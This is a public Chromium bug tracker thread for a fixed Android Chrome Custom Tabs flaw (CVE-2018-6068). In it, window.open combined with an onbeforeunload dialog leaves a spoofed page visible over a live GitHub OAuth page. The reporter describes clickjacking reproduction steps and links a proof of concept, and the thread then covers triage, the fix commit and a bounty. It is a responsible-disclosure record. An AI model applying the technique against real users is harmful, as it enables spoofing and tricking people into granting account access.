New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 798933 link

Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Not on Chrome anymore
Closed: Feb 2018
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Android
Pri: 1
Type: Bug-Security


Participants' hotlists:
x..


Sign in to add a comment

Chrome for Android - Window.open combined with the onbeforeunload dialog crashes Chrome's WebView render

Reported by luan.her...@hotmail.com, Jan 4 2018

Issue description

VULNERABILITY DETAILS
Opening a new window while in Chrome's WebView and redirecting the opener's location to trigger an onbeforeunload dialog crashes the render while still allowing the user to interact with the page in the background.
This allows the attacker to spoof the URL and also to perform "clickjacking" on any website.

VERSION
I tested on:
Chrome 63.0.3239.111 / Android 6.0.1

REPRODUCTION CASE

WARNING:
By following through the PoC, you will end up giving permission to the app "OAuth.io" to read your private email on Github.

1. From Chrome's WebView, you should access https://lbherrera.github.io/lab/render/index.html
1. Click on the link.
2. A dialog will show up asking if you want to leave the page, click in "Leave".
3. Click in the button "Redeem prize". If no button shows up, try again from Step 1.

* I made this PoC only having my phone's screen resolution in mind, so the the button's location may be off and you will need to click elsewhere to give permission to the "attacker" on GitHub, but a dedicated attacker could easily fix this, as he knows the users' screen resolution.
 
poc.mp4
5.4 MB View Download
Status: Untriaged (was: Unconfirmed)
I need to look into this more.

I was able to reproduce the exploit using the Twitter app exactly as you did.

However, I wasn't able to reproduce this using the webview_shell, the crashed renderer was immediately replaced by the page you were trying to clickjack on Github.

I'm unsure if Twitter is doing something weird or the WebView shell is behaving differently than WebView in apps.
Components: Mobile>WebView
Labels: Security_Severity-Medium Security_Impact-Stable OS-Android
As I expected, I was able to reproduce this using another app using WebView.
I just tested and was able to reproduce it on Telegram and Facebook apps, so it doesn't seem to be something Twitter is doing specifically.
Owner: timvolod...@chromium.org
Status: Assigned (was: Untriaged)
timvolodine@ Could you please take a look at this?

Thank you
Project Member

Comment 5 by sheriffbot@chromium.org, Jan 5 2018

Labels: M-64
Project Member

Comment 6 by sheriffbot@chromium.org, Jan 5 2018

Labels: Pri-1
Project Member

Comment 7 by sheriffbot@chromium.org, Jan 18 2018

timvolodine: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Owner: ----
Status: Available (was: Assigned)
currently no cycles to look at this.. unassigning to allow somebody else pick this up.

Comment 9 by mea...@chromium.org, Jan 26 2018

Cc: wjmaclean@chromium.org eugene...@chromium.org
eugenebut, wjmaclean: Would either of you be able to take a look at this medium severity bug? Thanks!
I'm afraid I have *zero* experience with Android WebView (which is quite a separate thing from desktop WebView, which I do work on).
Cc: -eugene...@chromium.org tedc...@chromium.org changwan@chromium.org
I don't work on Chrome for Android or Android WebView. From By description it's unclear if the problem is specific to Chrome or WebView. CCing folks from WebView and Chrome for Android to help with triage.
Owner: bauerb@chromium.org
Status: Assigned (was: Available)
The twitter page looks like a chrome custom tab, so maybe not WebView related at all.  Does this reproduce in the standalone Chrome app?
#12: I believe you are right. I was not aware of Chrome Custom Tab's and mistakenly took it for the WebView. Sorry about that :/

And no, it doesn't reproduce on the standalone app.
Project Member

Comment 14 by sheriffbot@chromium.org, Feb 1 2018

bauerb: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Cc: yus...@chromium.org
Components: -Mobile>WebView UI>Browser>Mobile>CustomTabs
Thanks, nagbot! :-D

A few initial notes: 
* I can reproduce this in Stable and Canary. In a local debug build I get a blank page instead of the "Redeem prize" page, but otherwise the same behavior. I'll try a Release build to see if that makes a difference.
* I did not get any indication of an actual crash (either as a crash report or a stack trace on logcat). If there is a process going down, it's doing that very silently.
* The page that is being loaded definitely is https://github.com (as seen in the origin indicator), and it can even be interacted with (I get a keyboard popping up when I tap on the page, presumably because I'm hitting a text input field), but what is _visible_ is the old page.
* chrome://inspect/#devices actually shows two tabs (!) when that happens. By clicking "focus tab" I can switch the active tab.
* If the github authorization tab is active (i.e. not the spoof page), what is visible in the custom tab is ever so slightly blurry, which is what happens if the compositor draws a saved snapshot of the webcontents (which is stored at slightly reduced quality) instead of the "live" webcontents.
Status: Started (was: Assigned)
WIP CL is up at https://chromium-review.googlesource.com/c/chromium/src/+/904982.
Cc: mdjones@chromium.org
Components: UI>Browser>Mobile>CompositedUI
Project Member

Comment 18 by bugdroid1@chromium.org, Feb 8 2018

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/371ba40daa4b7c34912b02e0288e165ae2043a93

commit 371ba40daa4b7c34912b02e0288e165ae2043a93
Author: Bernhard Bauer <bauerb@chromium.org>
Date: Thu Feb 08 11:06:02 2018

πŸ–ΏπŸ”¬ Move tab observation from LayoutManagerChrome to LayoutManager.

This ensures that all activities using a LayoutManager observe the necessary tab
events (not just ChromeTabbedActivity), and allows removing the
CustomTabLayoutManager, which used to observe only a subset of events.

Bug:  798933 
Change-Id: I20242ba89fc058256adeddfdc42260c0220a9fe8
Reviewed-on: https://chromium-review.googlesource.com/904982
Commit-Queue: Bernhard Bauer <bauerb@chromium.org>
Reviewed-by: Matthew Jones <mdjones@chromium.org>
Reviewed-by: Yusuf Ozuysal <yusufo@chromium.org>
Cr-Commit-Position: refs/heads/master@{#535351}
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/compositor/layouts/LayoutManager.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/compositor/layouts/LayoutManagerChrome.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/compositor/layouts/LayoutManagerChromeTablet.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/customtabs/CustomTabActivity.java
[delete] https://crrev.com/21a534ef80dc7ab11a42747f2601bdc48a740ba8/chrome/android/java/src/org/chromium/chrome/browser/customtabs/CustomTabLayoutManager.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/webapps/WebappActivity.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java_sources.gni

Status: Fixed (was: Started)
Cc: est...@chromium.org
+Emily because spoofing

Do I need to do anything special to make the sheriffbot pick this up?
No need to do anything special for sheriffbot, however, I think we may want to try to merge this to M65 per https://chromium.googlesource.com/chromium/src/+/master/docs/security/severity-guidelines.md#medium-severity.

Thanks for the fix!
Ah, great, thank you!
Project Member

Comment 24 by sheriffbot@chromium.org, Feb 8 2018

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Labels: -M-64 M-65
Labels: -reward-topanel reward-unpaid reward-2000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one luan.herrera@! The Chrome VRP panel decided to award $2,000 for this report. Thanks!
Labels: -reward-unpaid reward-inprocess
Labels: Release-0-M65
Labels: CVE-2018-6068
Project Member

Comment 32 by sheriffbot@chromium.org, Mar 16 2018

Labels: Merge-Request-66
Project Member

Comment 33 by sheriffbot@chromium.org, Mar 16 2018

Labels: -Merge-Request-66 Merge-Review-66 Hotlist-Merge-Review
This bug requires manual review: M66 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), josafat@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 34 by cmasso@google.com, Mar 19 2018

Please verify the fix in the latest canary

Comment 35 by cmasso@google.com, Mar 23 2018

Ping!
Cc: -wjmaclean@chromium.org

Comment 37 by cmasso@google.com, Mar 26 2018

awhalley@ please can you make ensure this issue is merge into M66? Unless it can wait?

Comment 38 by cmasso@google.com, Mar 30 2018

Cc: awhalley@chromium.org
I have requested this issue to be merged into M66 since March 19th. We are now only few days away from releasing M66. Can someone on this thread handle this since the owner does not respond? 

awhalley@ do we care about merging this security issue?
Labels: -Merge-Review-66
No merge needed for 66
Labels: CVE_description-missing
Project Member

Comment 41 by sheriffbot@chromium.org, May 17 2018

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -CVE_description-missing CVE_description-submitted

Sign in to add a comment